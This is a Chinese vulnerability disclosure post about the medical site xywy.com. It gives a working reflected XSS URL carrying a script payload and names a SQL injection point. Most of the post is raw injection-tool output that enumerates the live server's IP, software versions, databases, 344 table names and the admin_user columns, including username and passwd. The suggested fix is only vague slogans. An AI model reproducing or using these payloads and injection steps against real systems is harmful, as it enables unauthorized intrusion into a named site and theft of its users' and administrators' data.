XSS跨站
 
http://club.xywy.com/zjzx/?type=list&cq=%22%3E%3Cscript%3Ealert%280604795%29%3B%3C/script%3E
 
注射漏洞：
 
http://c1.xywy.com/huodong/yspx/medal_team.php?id=326
 
 Analyzing http://c1.xywy.com/huodong/yspx/medal_team.php?id=326
Host IP: 115.182.68.232
Web Server: XT-server/0.0
Powered-by: PHP/5.2.14p1
Can not find keyword but let me do a try!
I guess injection type is Integer?! If injection failed, retry with a manual keyword.
Can't find db server type! But maybe there be some chances! [-o<
Selected Column Count is 6
Valid String Column is 1
DB Server: MySQL
Current DB: club
Count(table_name) of information_schema.tables where table_schema=0x636C7562 is 344
Can not get all tables by group_concat!
Count(table_name) of information_schema.tables where table_schema=0x636C7562 is 344
Canceling...
Job Canceled!
Data Base Found: information_schema
Data Base Found: club
Data Base Found: new_club
Count(table_name) of information_schema.tables where table_schema=0x6E65775F636C7562 is 0
Table found: active_manage
Count(column_name) of information_schema.columns where table_schema=0x6E65775F636C7562 and table_name=0x6163746976655F6D616E616765 is 0
Column found: id
Count(table_name) of information_schema.tables where table_schema=0x636C7562 is 344
Table found: 111_doctor_stats_temp
Table found: 111_question
Table found: 111_question_detail
Table found: 111_reply
Table found: 111_tmp
Table found: 111_tmpdir
Table found: BoxItem
Table found: TopBox
Table found: acceptelec
Table found: act_egg
Table found: act_egg_back
Table found: act_egg_card
Table found: act_egg_tmp
Table found: active_manage
Table found: admin_fun
Table found: admin_fun_new
Table found: admin_group
Table found: admin_group_fun_new
Table found: admin_group_new
Table found: admin_log
Table found: admin_user
Table found: admin_user_fun
Table found: admin_user_log
Table found: admin_user_new
Table found: admin_user_post
Table found: admin_user_post_bak
Table found: admin_user_status
Table found: agree_count_data
Table found: article
Table found: attention_num
Table found: audit_time_set
Table found: baidu_question
Table found: baidu_question_temp
Table found: bak_20120523_question
Table found: bak_20120523_question_detail
Table found: bak_20120523_question_pic
Table found: bak_20120523_reply
Table found: banzhu_job_stat
Table found: bbs_topic
Table found: bbsconfig
Table found: blog_click
Table found: blog_commend
Table found: blog_common
Table found: blog_reply
Table found: blog_sort
Table found: blog_u
Table found: boxitem
Table found: business_club
Table found: ceng_click_count
Table found: chat_log_pigeonhole
Table found: chat_statistics
Table found: chatdoctorlist
Table found: chatinfo
Table found: chatlist
Table found: chattemp
Table found: choose_temp
Table found: chunjie_huodong
Table found: chunjie_huojiang
Table found: commend
Table found: commend_detail
Table found: commend_detail_temp
Table found: commend_doctor
Table found: commend_doctor_new
Table found: confident_temp
Table found: count_sendrecord
Table found: count_sendrecord_tmp
Table found: date_notice
Table found: del_data
Table found: deluser
Table found: depart_right
Table found: dialog
Table found: doc_tp_day
Table found: doc_tp_month
Table found: doc_tp_temp
Table found: doc_tp_week
Table found: doctor_card
Table found: doctor_card_assign
Table found: doctor_handle
Table found: doctor_medal_spread
Table found: doctor_stat
Table found: doctor_stat_20110923
Table found: doctor_stat_20110927
Table found: doctor_stat_20110930
Table found: doctor_stat_20111208
Table found: doctor_stat_20120101
Table found: doctor_stat_20120102
Table found: doctor_stat_20120114
Table found: doctor_stat_20120125
Table found: doctor_stat_20120406
Table found: doctor_stat_20120422m
Table found: doctor_stat_bak20120221
Table found: doctor_stat_maliu
Table found: doctor_stat_maliu_bak
Table found: doctor_stat_month
Table found: doctor_stat_month_0523
Table found: doctor_stat_month_0601
Table found: doctor_stat_month_0602
Table found: doctor_stat_month_0603
Table found: doctor_stat_month_bak
Table found: doctor_stat_old
Table found: doctor_stats_backup
Table found: doctor_stats_temp
Table found: doctor_stats_temp_20120422m
Table found: doctor_subject
Table found: exchange
Table found: expert_online
Table found: expert_online_time
Table found: extend_keyword
Table found: favor_doc
Table found: favor_drug
Table found: favor_drug_shop
Table found: favor_hospital
Table found: favor_jbill
Table found: favorite
Table found: favorite_folder
Table found: fill_keyword
Table found: fill_keyword_0606
Table found: fill_keyword_del
Table found: fill_keyword_lock
Table found: fill_keywords_skip
Table found: fill_question
Table found: fill_question_bak
Table found: filter_detail
Table found: filter_notify
Table found: filter_question
Table found: friend
Table found: getbbs_point
Table found: heath_awoke
Table found: home_count
Table found: home_guide_count
Table found: hospital_doc_link
Table found: hospital_question
Table found: hospital_question_temp
Table found: hot_infomation
Table found: huodong2008
Table found: huodong_2011
Table found: id_keyword
Table found: ill_to_subject
Table found: index_admin
Table found: index_ceng
Table found: invite_friend
Table found: ip_deny
Table found: jfsc_class
Table found: jfsc_class_20110929
Table found: jfsc_exchange
Table found: jfsc_exchange_detail
Table found: jfsc_product
Table found: jfsc_proimg
Table found: josso_role
Table found: josso_user_property
Table found: josso_user_role
Table found: keyword
Table found: keyword_ad
Table found: keyword_ad_new
Table found: keyword_ad_user
Table found: keyword_deny
Table found: keyword_deny_bak
Table found: keyword_deny_tmp
Table found: keyword_ini
Table found: message
Table found: messageold
Table found: new_doctor_commend
Table found: point
Table found: point22
Table found: point_20111008
Table found: point_process
Table found: point_process_backup20091221
Table found: point_process_bak
Table found: point_process_test
Table found: point_temp
Table found: point_tmp
Table found: presend
Table found: product
Table found: proxy_client_api
Table found: qq_group
Table found: que_agree_count
Table found: ques_zjt
Table found: question
Table found: question091101
Table found: question091101_attach
Table found: question091101_detail
Table found: question091101_pic
Table found: question091101_reply
Table found: question100501
Table found: question100501_attach
Table found: question100501_detail
Table found: question100501_pic
Table found: question100501_reply
Table found: question101001
Table found: question101001_attach
Table found: question101001_detail
Table found: question101001_pic
Table found: question101001_reply
Table found: question110201
Table found: question110201_attach
Table found: question110201_detail
Table found: question110201_pic
Table found: question110201_reply
Table found: question110719
Table found: question110719_attach
Table found: question110719_detail
Table found: question110719_pic
Table found: question110719_reply
Table found: question110814
Table found: question110814_attach
Table found: question110814_detail
Table found: question110814_pic
Table found: question110814_reply
Table found: question110922
Table found: question110922_attach
Table found: question110922_detail
Table found: question110922_pic
Table found: question110922_reply
Table found: question111202
Table found: question111202_attach
Table found: question111202_detail
Table found: question111202_pic
Table found: question111202_reply
Table found: question120202
Table found: question120202_attach
Table found: question120202_detail
Table found: question120202_pic
Table found: question120202_reply
Table found: question120523
Table found: question120523_attach
Table found: question120523_detail
Table found: question120523_pic
Table found: question120523_reply
Table found: question_0814_bak
Table found: question_20110916
Table found: question_attach
Table found: question_attach_old
Table found: question_attach_tmp
Table found: question_broadcast
Table found: question_del
Table found: question_del_stat_backup
Table found: question_del_stat_temp
Table found: question_detail
Table found: question_detail_0814_bak
Table found: question_detail_new
Table found: question_detail_tmp_bak
Table found: question_elite
Table found: question_elite_temp
Table found: question_fristpage
Table found: question_hos_doc
Table found: question_hos_doc_tmp
Table found: question_jib
Table found: question_new
Table found: question_pass
Table found: question_pic
Table found: question_pic_0814_bak
Table found: question_pic_new
Table found: question_pic_tmp_bak
Table found: question_recycle
Table found: question_reply_lock
Table found: question_reply_time
Table found: question_shortmsg_set
Table found: question_temp
Table found: question_tmp_bak
Table found: question_total_day
Table found: question_total_subject
Table found: question_total_subject_comeback
Table found: question_total_tmp
Table found: questionold
Table found: questionold090228
Table found: questionold090228_attach
Table found: questionold090228_detail
Table found: questionold090228_pic
Table found: questionold090228_reply
Table found: questionold_attach
Table found: questionold_detail
Table found: questionold_pic
Table found: questionold_reply
Table found: quick_question
Table found: range_keywords
Table found: rational_to_question
Table found: receive_msg
Table found: record_space
Table found: reply www.2cto.com
Table found: reply_0814_bak
Table found: reply_201205211251
Table found: reply_del_temp
Table found: reply_new
Table found: reply_recycle
Table found: reply_taolun
Table found: reply_taolun_194
Table found: reply_temp
Table found: reply_tmp_bak
Table found: search_history
Table found: search_keyword
Table found: search_keyword_sell
Table found: search_keyword_sell_pre
Table found: search_question
Table found: search_question_xg
Table found: send_email
Table found: shortmsg_info
Table found: shortmsg_send_count
Table found: sina_user
Table found: soft_offon
Table found: soft_r
Table found: subject_owner
Table found: subyqlj
Table found: system_msg_readruser
Table found: tag_keyword
Table found: tmp_hospital
Table found: tmppp
Table found: topbox
Table found: topics_actions
Table found: tousu
Table found: user_act_email
Table found: user_action
Table found: user_action_20110908
Table found: user_action_20120502
Table found: user_action_reply
Table found: user_album
Table found: user_album_folder
Table found: user_attention
Table found: user_blog
Table found: user_blog_bak
Table found: user_blog_kind
Table found: user_callin
Table found: user_common_info
Table found: user_common_new
Table found: user_doctor_info
Table found: user_doctor_new
Table found: user_doctor_reply_tuan
Table found: user_job
Table found: user_link_rr
Table found: user_new
Table found: user_setting
Table found: user_setting_back
Table found: user_time
Table found: user_work_info
Table found: user_youke_new
Table found: wb_address
Table found: wb_answer_log
Table found: wb_card
Table found: wb_faverite
Table found: wb_get_faverite_log
Table found: whx_test
Table found: youjiangdiaocha
Table found: youjiangdiaocha_people
Table found: youjiangdiaocha_tongji
Table found: zhaopin
Count(column_name) of information_schema.columns where table_schema=0x636C7562 and table_name=0x61646D696E5F75736572 is 7
Column found: id
Column found: pid
Column found: username
Column found: passwd
Column found: createtime
Column found: subject
Column found: userid
 
 
 


 
 
 
 
 
修复方案：

加强安全体系！
 
树立安全意识！

作者：zeracker